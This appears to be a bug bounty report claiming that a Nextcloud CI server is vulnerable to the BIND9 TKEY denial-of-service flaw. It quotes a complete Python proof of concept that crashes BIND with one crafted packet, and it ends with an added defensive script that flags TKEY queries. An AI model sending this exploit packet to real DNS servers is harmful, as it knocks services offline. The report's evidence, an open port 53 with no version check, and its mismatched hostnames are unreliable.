ci.nextcloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)
High
Vulnerability Details
Hello Team NextCloud,
In reference to report #217381,
I reported the DDoS attack via the DNS port at OwnCloud.
And it was successfully patched.
But now I got the same issue at
```
ci.nextcloud.com
```
Proof Of Concept:
Here is the nmap result of ci.nextcloud.com
NMap Scan Results:
```
Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-08 04:12 PKT
Nmap scan report for ci.nextcloud.com (█████)
Host is up (0.077s latency).
rDNS record for █████████: ███████
Not shown: 96 filtered ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
53/tcp open tcpwrapped
80/tcp open tcpwrapped
443/tcp open tcpwrapped
```
Now here is the telnet result:
```
──╼ $telnet
telnet> open
(to) ci.nextcloud.com 53
Trying ███...
Connected to ci.nextcloud.com.
Escape character is '^]'.
```
So this can lead to a serious DDoS attack at doc.owncloud.com using the exploit.
Exploit Link:
```
https://github.com/elceef/tkeypoc/
```
Vulnerability Reference CVE Details:
```
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477
```
Exploit PoC:
Exploit Title: PoC for BIND9 TKEY DoS
Exploit Author: elceef
Software Link: https://github.com/elceef/tkeypoc/
Version: ISC BIND 9
Tested on: multiple
CVE : CVE-2015-5477
```
#!/usr/bin/env python
import socket
import sys

print('CVE-2015-5477 BIND9 TKEY PoC')

if len(sys.argv) < 2:
    print('Usage: ' + sys.argv[0] + ' [target]')
    sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))

print('Done.')
```
Thanks :)
Report Stats
- Report ID: 237860
- State: Closed
- Substate: resolved
- Upvotes: 3
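A defender-side check for the query type carried in the PoC payload above (QTYPE bytes `00 f9`, i.e. 249 = TKEY), added here as an example and not part of the original report or the linked project: it parses the question section of a raw DNS message and flags TKEY queries so they can be logged or dropped where TKEY is not in use. The function names and the sample packets are constructed for illustration.

```python
import struct

TKEY = 249  # DNS RR type TKEY (RFC 2930), the QTYPE seen in the PoC payload

def question_types(msg: bytes):
    """Return the QTYPE of each question in a raw DNS message (UDP payload)."""
    if len(msg) < 12:
        raise ValueError("shorter than the 12-byte DNS header")
    qdcount = struct.unpack("!H", msg[4:6])[0]
    pos, types = 12, []
    for _ in range(qdcount):
        # Walk the QNAME label by label until the zero-length root label.
        while True:
            if pos >= len(msg):
                raise ValueError("truncated QNAME")
            length = msg[pos]
            pos += 1
            if length == 0:
                break
            if length & 0xC0:
                raise ValueError("compression pointer in question name")
            pos += length
        if pos + 4 > len(msg):
            raise ValueError("truncated question")
        qtype, _qclass = struct.unpack("!HH", msg[pos:pos + 4])
        types.append(qtype)
        pos += 4
    return types

def is_tkey_query(msg: bytes) -> bool:
    """True for a query (QR=0) that asks for TKEY; malformed input is not flagged."""
    try:
        is_query = len(msg) >= 3 and not (msg[2] & 0x80)
        return is_query and TKEY in question_types(msg)
    except ValueError:
        return False

def build_query(name: str, qtype: int) -> bytes:
    """Constructed sample: header plus one question, no other sections."""
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)

if __name__ == "__main__":
    for label, pkt in [("A", build_query("example.com", 1)),
                       ("TKEY", build_query("example.com", TKEY))]:
        print(label, "flagged" if is_tkey_query(pkt) else "ok")
```

Feed `is_tkey_query` the UDP payload of packets captured on port 53; it only classifies traffic and does not replace patching BIND.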